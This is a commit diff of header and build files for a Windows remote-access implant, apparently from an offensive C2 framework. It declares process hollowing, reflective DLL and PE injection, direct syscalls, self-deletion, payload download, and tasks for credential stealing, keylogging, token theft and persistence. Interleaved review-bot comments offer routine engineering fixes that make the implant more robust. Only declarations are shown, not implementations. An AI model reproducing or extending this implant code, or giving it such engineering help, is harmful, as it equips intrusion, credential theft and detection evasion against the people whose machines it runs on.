

Refactor implant code
hideckies committed May 7, 2024
1 parent 2eedce3 commit a2178a2
Showing 23 changed files with 1,153 additions and 229 deletions.
3 changes: 2 additions & 1 deletion payload/win/implant/CMakeLists.txt
Expand Up @@ -75,6 +75,7 @@ set(SOURCE_CORE
src/core/system/registry.cpp
src/core/system/user.cpp
src/core/technique/injection/dll_injection.cpp
src/core/technique/injection/pe_injection.cpp
src/core/technique/injection/shellcode_injection.cpp
src/core/task/assembly.cpp
src/core/task/cat.cpp
Expand All @@ -86,7 +87,6 @@ set(SOURCE_CORE
src/core/task/dll.cpp
src/core/task/download.cpp
src/core/task/env.cpp
src/core/task/exe.cpp
src/core/task/group.cpp
src/core/task/history.cpp
src/core/task/ip.cpp
Expand All @@ -99,6 +99,7 @@ set(SOURCE_CORE
src/core/task/mkdir.cpp
src/core/task/mv.cpp
src/core/task/net.cpp
src/core/task/pe.cpp
src/core/task/persist.cpp
src/core/task/procdump.cpp
src/core/task/ps.cpp
Expand Down
54 changes: 54 additions & 0 deletions payload/win/implant/include/core/ntdll.hpp
Expand Up @@ -23,6 +23,16 @@ typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];

typedef struct BASE_RELOCATION_BLOCK {
DWORD PageAddress;
DWORD BlockSize;
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {
USHORT Offset : 12;
USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;

// **For NtSystemDebugControl**
typedef enum _SYSDBG_COMMAND
{
Expand Down Expand Up @@ -177,4 +187,48 @@ typedef struct _KEY_VALUE_FULL_INFORMATION
// UCHAR Data[1];
} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;

typedef struct _FILE_RENAME_INFO {
union {
BOOLEAN ReplaceIfExists;
DWORD Flags;
} DUMMYUNIONNAME;
// BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
DWORD FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFO, *PFILE_RENAME_INFO;

typedef struct _FILE_DISPOSITION_INFO {
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFO, *PFILE_DISPOSITION_INFO;

typedef enum _FILE_INFO_BY_HANDLE_CLASS {
FileBasicInfo,
FileStandardInfo,
FileNameInfo,
FileRenameInfo,
FileDispositionInfo,
FileAllocationInfo,
FileEndOfFileInfo,
FileStreamInfo,
FileCompressionInfo,
FileAttributeTagInfo,
FileIdBothDirectoryInfo,
FileIdBothDirectoryRestartInfo,
FileIoPriorityHintInfo,
FileRemoteProtocolInfo,
FileFullDirectoryInfo,
FileFullDirectoryRestartInfo,
FileStorageInfo,
FileAlignmentInfo,
FileIdInfo,
FileIdExtdDirectoryInfo,
FileIdExtdDirectoryRestartInfo,
FileDispositionInfoEx,
FileRenameInfoEx,
FileCaseSensitiveInfo,
FileNormalizedNameInfo,
MaximumFileInfoByHandleClass
} FILE_INFO_BY_HANDLE_CLASS, *PFILE_INFO_BY_HANDLE_CLASS;

#endif // HERMIT_CORE_NTDLL_H
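Review bot: FILE_RENAME_INFO, FILE_DISPOSITION_INFO and FILE_INFO_BY_HANDLE_CLASS in the second hunk carry the same names as the public SDK types declared in winbase.h for _WIN32_WINNT >= 0x0600, so any translation unit that includes <windows.h> at that target level will get redefinition errors; whether the project pins an older version is not visible here and deserves a comment on why local copies are needed. BASE_RELOCATION_ENTRY in the first hunk relies on the two USHORT bit-fields sharing one 16-bit unit, which is compiler-defined layout rather than a language guarantee; `static_assert(sizeof(BASE_RELOCATION_ENTRY) == sizeof(USHORT), "relocation entry must be 16 bits");` under the typedef would catch a toolchain that packs it differently. The commented-out `// BOOLEAN ReplaceIfExists;` inside FILE_RENAME_INFO duplicates the union member above it and is dead text.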
27 changes: 23 additions & 4 deletions payload/win/implant/include/core/procs.hpp
Expand Up @@ -39,8 +39,8 @@ namespace Procs

// NtFlushInstructionCache
typedef NTSTATUS (NTAPI* LPPROC_NTFLUSHINSTRUCTIONCACHE)(HANDLE ProcessHandle, PVOID BaseAddress, SIZE_T Length);
// NtCreateProcess
typedef NTSTATUS (NTAPI* LPPROC_NTCREATEPROCESS)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ParentProcess, BOOLEAN InheritObjectTable, HANDLE SectionHandle, HANDLE DebugPort, HANDLE TokenHandle);
// NtCreateProcessEx
typedef NTSTATUS (NTAPI* LPPROC_NTCREATEPROCESSEX)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ParentProcess, ULONG Flags, HANDLE SectionHandle, HANDLE DebugPort, HANDLE TokenHandle, ULONG Reserved);
// NtOpenProcess
typedef NTSTATUS (NTAPI* LPPROC_NTOPENPROCESS)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
// NtOpenProcessToken
Expand All @@ -53,8 +53,14 @@ namespace Procs
typedef NTSTATUS (NTAPI* LPPROC_NTCREATETHREADEX)(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE StartRoutine, PVOID Argument, ULONG CreateFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PPS_ATTRIBUTE_LIST AttributeList);
// NtResumeThread
typedef NTSTATUS (NTAPI* LPPROC_NTRESUMETHREAD)(HANDLE ThreadHandle, PULONG PreviousSuspendCount);
// NtGetContextThread
typedef NTSTATUS (NTAPI* LPPROC_NTGETCONTEXTTHREAD)(HANDLE ThreadHandle, PCONTEXT ThreadContext);
// NtSetContextThread
typedef NTSTATUS (NTAPI* LPPROC_NTSETCONTEXTTHREAD)(HANDLE ThreadHandle, PCONTEXT ThreadContext);
// NtAllocateVirtualMemory
typedef NTSTATUS (NTAPI* LPPROC_NTALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
// NtReadVirtualMemory
typedef NTSTATUS (NTAPI* LPPROC_NTREADVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesRead);
// NtWriteVirtualMemory
typedef NTSTATUS (NTAPI* LPPROC_NTWRITEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
// NtProtectVirtualMemory
Expand Down Expand Up @@ -101,6 +107,8 @@ namespace Procs
typedef NTSTATUS (NTAPI* LPPROC_NTQUERYKEY)(HANDLE KeyHandle, KEY_INFORMATION_CLASS KeyInformationClass, PVOID KeyInformation, ULONG Length, PULONG ResultLength);
// NtEnumerateValueKey
typedef NTSTATUS (NTAPI* LPPROC_NTENUMERATEVALUEKEY)(HANDLE KeyHandle, ULONG Index, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength);
// NtUnmapViewOfSection
typedef NTSTATUS (NTAPI* LPPROC_NTUNMAPVIEWOFSECTION)(HANDLE ProcessHandle, PVOID BaseAddress);

// **NATIVE APIs (RUNTIME LIBRARY)**
// RtlAllocateHeap
Expand Down Expand Up @@ -145,6 +153,8 @@ namespace Procs
typedef BOOL (WINAPI* LPPROC_VIRTUALFREE)(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
// closeHandle
typedef BOOL (WINAPI* LPPROC_CLOSEHANDLE)(HANDLE hObject);
// SetFileInformationByHandle
typedef BOOL (WINAPI* LPPROC_SETFILEINFORMATIONBYHANDLE)(HANDLE hFile, FILE_INFO_BY_HANDLE_CLASS FileInformationClass, LPVOID lpFileInformation, DWORD dwBufferSize);
// MessageBoxA
typedef int (WINAPI* LPPROC_MESSAGEBOXA)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);
// WinHttpOpen
Expand Down Expand Up @@ -173,14 +183,17 @@ namespace Procs
struct PROCS
{
// **NATIVE APIs**
LPPROC_NTCREATEPROCESS lpNtCreateProcess = nullptr;
LPPROC_NTCREATEPROCESSEX lpNtCreateProcessEx = nullptr;
LPPROC_NTOPENPROCESS lpNtOpenProcess = nullptr;
LPPROC_NTOPENPROCESSTOKEN lpNtOpenProcessToken = nullptr;
LPPROC_NTTERMINATEPROCESS lpNtTerminateProcess = nullptr;
LPPROC_NTSETINFORMATIONPROCESS lpNtSetInformationProcess = nullptr;
LPPROC_NTCREATETHREADEX lpNtCreateThreadEx = nullptr;
LPPROC_NTRESUMETHREAD lpNtResumeThread = nullptr;
LPPROC_NTGETCONTEXTTHREAD lpNtGetContextThread = nullptr;
LPPROC_NTSETCONTEXTTHREAD lpNtSetContextThread = nullptr;
LPPROC_NTALLOCATEVIRTUALMEMORY lpNtAllocateVirtualMemory = nullptr;
LPPROC_NTREADVIRTUALMEMORY lpNtReadVirtualMemory = nullptr;
LPPROC_NTWRITEVIRTUALMEMORY lpNtWriteVirtualMemory = nullptr;
LPPROC_NTPROTECTVIRTUALMEMORY lpNtProtectVirtualMemory = nullptr;
LPPROC_NTFREEVIRTUALMEMORY lpNtFreeVirtualMemory = nullptr;
Expand All @@ -204,6 +217,7 @@ namespace Procs
LPPROC_NTOPENKEYEX lpNtOpenKeyEx = nullptr;
LPPROC_NTQUERYKEY lpNtQueryKey = nullptr;
LPPROC_NTENUMERATEVALUEKEY lpNtEnumerateValueKey = nullptr;
LPPROC_NTUNMAPVIEWOFSECTION lpNtUnmapViewOfSection = nullptr;

// **RUNTIME LIBRARY APIs**
LPPROC_RTLALLOCATEHEAP lpRtlAllocateHeap = nullptr;
Expand All @@ -219,6 +233,7 @@ namespace Procs

// **WINAPIs**
LPPROC_QUERYFULLPROCESSIMAGENAMEW lpQueryFullProcessImageNameW = nullptr;
LPPROC_SETFILEINFORMATIONBYHANDLE lpSetFileInformationByHandle = nullptr;
LPPROC_WINHTTPOPEN lpWinHttpOpen = nullptr;
LPPROC_WINHTTPCONNECT lpWinHttpConnect = nullptr;
LPPROC_WINHTTPOPENREQUEST lpWinHttpOpenRequest = nullptr;
Expand All @@ -232,14 +247,17 @@ namespace Procs
LPPROC_WINHTTPCLOSEHANDLE lpWinHttpCloseHandle = nullptr;

// **SYSCALLS**
Syscalls::SYSCALL sysNtCreateProcess = {0};
Syscalls::SYSCALL sysNtCreateProcessEx = {0};
Syscalls::SYSCALL sysNtOpenProcess = {0};
Syscalls::SYSCALL sysNtOpenProcessToken = {0};
Syscalls::SYSCALL sysNtTerminateProcess = {0};
Syscalls::SYSCALL sysNtSetInformationProcess = {0};
Syscalls::SYSCALL sysNtCreateThreadEx = {0};
Syscalls::SYSCALL sysNtResumeThread = {0};
Syscalls::SYSCALL sysNtGetContextThread = {0};
Syscalls::SYSCALL sysNtSetContextThread = {0};
Syscalls::SYSCALL sysNtAllocateVirtualMemory = {0};
Syscalls::SYSCALL sysNtReadVirtualMemory = {0};
Syscalls::SYSCALL sysNtWriteVirtualMemory = {0};
Syscalls::SYSCALL sysNtProtectVirtualMemory = {0};
Syscalls::SYSCALL sysNtFreeVirtualMemory = {0};
Expand All @@ -263,6 +281,7 @@ namespace Procs
Syscalls::SYSCALL sysNtOpenKeyEx = {0};
Syscalls::SYSCALL sysNtQueryKey = {0};
Syscalls::SYSCALL sysNtEnumerateValueKey = {0};
Syscalls::SYSCALL sysNtUnmapViewOfSection = {0};

Syscalls::SYSCALL sysRtlAllocateHeap = {0};
Syscalls::SYSCALL sysRtlInitUnicodeString = {0};
Expand Down
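Review bot: The PROCS struct keeps every API in two parallel lists, the lpXxx pointer and the sysXxx syscall record, and this commit extends them by hand in four separate places (lpNtGetContextThread..lpNtReadVirtualMemory and lpNtUnmapViewOfSection, then the matching sysXxx entries); nothing ties the lists together, so an entry forgotten in one of them surfaces only as a zero-initialized member at run time. A one-line comment at the top of the struct, `// Keep the lpXxx members and the sysXxx members under **SYSCALLS** in sync; one entry per API.`, would at least make the invariant visible to the next person adding a function. The new LPPROC_SETFILEINFORMATIONBYHANDLE typedef also depends on FILE_INFO_BY_HANDLE_CLASS, which this same commit declares in ntdll.hpp rather than taking from the SDK, so the include order between the two headers is now load-bearing and is worth a comment next to the typedef.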
28 changes: 26 additions & 2 deletions payload/win/implant/include/core/system.hpp
Expand Up @@ -70,10 +70,12 @@ namespace System::Priv

namespace System::Process
{
HANDLE ProcessCreate(
HANDLE ProcessCreate(
Procs::PPROCS pProcs,
LPCWSTR lpApplicationName,
LPCWSTR lpApplicationName,
DWORD dwDesiredAccess,
BOOL bInheritHandles,
DWORD dwCreationFlags,
HANDLE hParentProcess,
HANDLE hToken
);
Expand All @@ -95,10 +97,19 @@ namespace System::Process
PVOID VirtualMemoryAllocate(
Procs::PPROCS pProcs,
HANDLE hProcess,
PVOID pBaseAddr,
SIZE_T dwSize,
DWORD dwAllocationType,
DWORD dwProtect
);
BOOL VirtualMemoryRead(
Procs::PPROCS pProcs,
HANDLE hProcess,
PVOID pBaseAddr,
PVOID pBuffer,
SIZE_T dwBufferSize,
PSIZE_T lpNumberOfBytesRead
);
BOOL VirtualMemoryWrite(
Procs::PPROCS pProcs,
HANDLE hProcess,
Expand Down Expand Up @@ -193,6 +204,9 @@ namespace System::Fs
Procs::PPROCS pProcs,
HANDLE hFile
);
BOOL SelfDelete(
Procs::PPROCS pProcs
);
}

namespace System::Http
Expand Down Expand Up @@ -227,6 +241,16 @@ namespace System::Http
Procs::PPROCS pProcs,
HINTERNET hRequest
);
std::vector<BYTE> DataDownload(
Procs::PPROCS pProcs,
Crypt::PCRYPT pCrypt,
HINTERNET hConnect,
LPCWSTR lpHost,
INTERNET_PORT nPort,
LPCWSTR lpPath,
LPCWSTR lpHeaders,
const std::wstring& wSrc
);
BOOL FileDownload(
Procs::PPROCS pProcs,
Crypt::PCRYPT pCrypt,
Expand Down
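Review bot: DataDownload in the last hunk returns `std::vector<BYTE>` with no way to distinguish a failed request from an empty body, while its sibling FileDownload directly below reports success through a BOOL; either document that an empty vector means failure or return `std::optional<std::vector<BYTE>>` so callers cannot mistake one for the other. VirtualMemoryRead's `PSIZE_T lpNumberOfBytesRead` parameter should state whether nullptr is accepted, since the NtReadVirtualMemory typedef it presumably forwards to takes the same optional out-pointer and callers will otherwise guess. VirtualMemoryAllocate gained a `PVOID pBaseAddr` parameter in the middle of its list; a short comment saying what passing nullptr means (let the system choose) would keep the existing call sites readable after they are updated.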
33 changes: 16 additions & 17 deletions payload/win/implant/include/core/task.hpp
Expand Up @@ -21,7 +21,6 @@
#include <psapi.h>
#include <strsafe.h>
#include <synchapi.h>
// #include <tlhelp32.h>
#include <chrono>
#include <map>
#include <string>
Expand Down Expand Up @@ -51,19 +50,19 @@
#define TASK_DLL 0x08
#define TASK_DOWNLOAD 0x09
#define TASK_ENV_LS 0x10
#define TASK_EXE 0x11
#define TASK_GROUP_LS 0x12
#define TASK_HISTORY 0x13
#define TASK_IP 0x14
#define TASK_JITTER 0x15
#define TASK_KEYLOG 0x16
#define TASK_KILL 0x17
#define TASK_KILLDATE 0x18
#define TASK_LS 0x19
#define TASK_MIGRATE 0x20
#define TASK_MKDIR 0x21
#define TASK_MV 0x22
#define TASK_NET 0x23
#define TASK_GROUP_LS 0x11
#define TASK_HISTORY 0x12
#define TASK_IP 0x13
#define TASK_JITTER 0x14
#define TASK_KEYLOG 0x15
#define TASK_KILL 0x16
#define TASK_KILLDATE 0x17
#define TASK_LS 0x18
#define TASK_MIGRATE 0x19
#define TASK_MKDIR 0x20
#define TASK_MV 0x21
#define TASK_NET 0x22
#define TASK_PE 0x23
#define TASK_PERSIST 0x24
#define TASK_PROCDUMP 0x25
#define TASK_PS_KILL 0x26
Expand Down Expand Up @@ -136,10 +135,9 @@ namespace Task
std::wstring Connect(State::PSTATE pState, const std::wstring& wListenerURL);
std::wstring Cp(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
std::wstring CredsSteal(State::PSTATE pState);
std::wstring Dll(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc);
std::wstring Dll(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc, const std::wstring& wTechnique);
std::wstring Download(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
std::wstring EnvLs(State::PSTATE pState);
std::wstring Exe(State::PSTATE pState, const std::wstring& wExeSrc);
std::wstring GroupLs();
std::wstring History(State::PSTATE pState);
std::wstring Ip();
Expand All @@ -152,6 +150,7 @@ namespace Task
std::wstring Mkdir(State::PSTATE pState, const std::wstring& wDir);
std::wstring Mv(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
std::wstring Net();
std::wstring Pe(State::PSTATE pState, const std::wstring& wTargetProcess, const std::wstring& wSrc, const std::wstring& wTechnique);
std::wstring Persist(State::PSTATE pState, const std::wstring& wTechnique);
std::wstring Procdump(State::PSTATE pState, const std::wstring& wPid);
std::wstring PsKill(State::PSTATE pState, const std::wstring& wPid);
Expand All @@ -165,7 +164,7 @@ namespace Task
std::wstring RportfwdRm(State::PSTATE pState);
std::wstring RunAs(State::PSTATE pState, const std::wstring& wUser, const std::wstring& wPassword, const std::wstring& wCmd);
std::wstring Screenshot(State::PSTATE pState);
std::wstring Shellcode(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc);
std::wstring Shellcode(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc, const std::wstring& wTechnique);
std::wstring SleepSet(State::PSTATE pState, const std::wstring& wSleep);
std::wstring TokenRevert();
std::wstring TokenSteal(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wProcName, bool bLogin);
Expand Down
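Review bot: Removing TASK_EXE in the second hunk shifts every code from TASK_GROUP_LS through TASK_NET down by one and reuses 0x23 for TASK_PE, so all existing numeric task codes change meaning; whatever issues these codes to the implant must be updated in lockstep, and nothing in the header says so. A comment above the block, `// Task codes are part of the wire protocol; renumbering them breaks compatibility with the peer that issues tasks.`, would make that explicit. The sequence 0x09, 0x10, 0x11 also shows the hex literals are being counted as if decimal, which is exactly the kind of hand-maintenance that an `enum class TaskType : BYTE` with implicitly sequential enumerators would remove.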
43 changes: 39 additions & 4 deletions payload/win/implant/include/core/technique.hpp
Expand Up @@ -7,15 +7,50 @@
#include <windows.h>
#include <vector>

typedef ULONG_PTR (WINAPI * LPPROC_REFLECTIVEDLLLOADER)();
typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);

#define DEREF(name)*(UINT_PTR *)(name)
#define DEREF_64(name)*(DWORD64 *)(name)
#define DEREF_32(name)*(DWORD *)(name)
#define DEREF_16(name)*(WORD *)(name)
#define DEREF_8(name)*(BYTE *)(name)

namespace Technique::Injection::Helper
{
DWORD Rva2Offset(DWORD dwRva, UINT_PTR uBaseAddr);
DWORD GetFuncOffset(LPVOID lpBuffer, LPCSTR lpFuncName);
}

namespace Technique::Injection
{
// DLL
BOOL DllInjection(
Procs::PPROCS pProcs,
DWORD dwPID,
LPVOID lpDllPath,
DWORD dwDllPathSize
Procs::PPROCS pProcs,
DWORD dwPID,
std::vector<BYTE> bytes
);
BOOL ReflectiveDLLInjection(
Procs::PPROCS pProcs,
DWORD dwPID,
std::vector<BYTE> bytes
);

// PE
BOOL DirectExecution(
Procs::PPROCS pProcs,
std::vector<BYTE> bytes
);
BOOL PEInjection(
Procs::PPROCS pProcs
);
BOOL ProcessHollowing(
Procs::PPROCS pProcs,
LPVOID lpBuffer,
const std::wstring &wTargetProcess
);

// Shellcode
BOOL ShellcodeInjection(
Procs::PPROCS pProcs,
DWORD dwPID,
Expand Down
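Review bot: DllInjection, ReflectiveDLLInjection and DirectExecution in this hunk take `std::vector<BYTE> bytes` by value, which copies the whole image on every call; unless the callee mutates the buffer the parameter should be `const std::vector<BYTE>& bytes` (or `std::span<const BYTE>` if the project is on C++20). The new DEREF family uses C-style casts in function-like macros with unparenthesized bodies; `template <class T> T& deref_as(UINT_PTR p) { return *reinterpret_cast<T*>(p); }` is type-checked and greppable, and at minimum the macro bodies should be wrapped in parentheses. PEInjection takes only pProcs while every sibling takes a buffer, and ProcessHollowing takes `LPVOID lpBuffer` with no length, which looks like incomplete signatures rather than intent; if they are stubs, a `// TODO` saying so would help. ProcessHollowing also names `std::wstring`, yet the hunk's visible includes are only <windows.h> and <vector>, so the header may be relying on a transitive include of <string>.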
